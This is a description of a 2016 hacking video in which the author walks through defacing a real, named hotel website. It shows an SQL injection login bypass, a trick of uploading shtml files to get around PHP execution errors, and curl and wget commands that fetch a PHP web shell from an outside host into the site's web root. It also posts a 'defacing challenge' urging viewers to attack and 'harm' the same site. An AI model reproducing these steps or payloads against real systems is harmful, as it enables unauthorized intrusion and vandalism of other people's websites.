500 Internal Server Error Bypass | ssi/shtml shell upload by B14ck_EyE

Опубликовано: 03 Декабрь 2016
на канале: SQLi Basic
7,641
38

ssi/shtml shell upload | 500 Internal Server Error Bypass


Assalamu Walaikum
I am B14ck_EyE as u know
Today I wanna show u how to upload shell in a website where having problem execute php
as
500 internal server error

Defacing Challenge (Easy)
site:aHR0cDovL3d3dy5tc2hvc3BpdGFsaXR5Lmlu
Task:Upload Your Deface Page in public_html(see my POC)
Rules:Dont use reverse ip :p
My POC:
http://www.mshospitality.in/index.html
Solvers:
1.Faisal Afzal
2.Anthony Edward Stark
3.Shaifullah Shaon
4.
5.
comment your POC to get in solvers list & please harm the website =D :v

We needed to bypass admin panel using xpath sql injection

here I used
email: [email protected]
pass: 'or'1'='1

its my uploader
just follow me



Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Server at www.mshospitality.in Port 80


500 Internal Server error
Try to upload html
follow me :D

Hacked Test By B14Ck_EyE
Challenged Completed by B14Ck_EyE


Here html successfully worked

Now I tried to use null byte shell as image :D

Same error
that means here php not be executable

Now try to upload shtml file :D

http://www.mshospitality.in/upload/14...

Here successfully working shtml file

so we needed to upload shtml shell

http://www.mshospitality.in/upload/14...

shtml working :D

now We try to upload our shell :D

We needed to wget command or curl command to upload shell


here 1st I used wget command for upload shell :D

Here wget command not be working
I used here
wgethttp://privshells.com/upload/r00t.txt -o root.php

now try using curl command as like

curl http://privshells.com/upload/r00t.txt -o root.php

curl command working :D
now try to find shell :D

http://www.mshospitality.in/upload/ro...
not working
same issue.

500 Internal server Error


so now I tried to upload shell in main directory in public_html


so now I used curl command like

curl http://privshells.com/upload/r00t.txt -o ../root.php

it's one way to upload shell in main directory
another way is :D

like :D

lol
uploader not working

:D


http://www.mshospitality.in/TeaMRoX.htm


Challenged completed :D

Nice.

Thanks to
Chaudhary Hamza
Antony Edward Stark
and also My Dear Team.

Allah Hafez
Thanks to watch my video


sorry for my bad connection and also bad English :

This Channel Just for Educational Purpose. One of the best ways is not responsible for the authorities.
Stay With us to Learn Basic SQLi with Manual.


Смотрите видео 500 Internal Server Error Bypass | ssi/shtml shell upload by B14ck_EyE онлайн без регистрации, длительностью часов минут секунд в хорошем качестве. Это видео добавил пользователь SQLi Basic 03 Декабрь 2016, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 7,641 раз и оно понравилось 38 людям.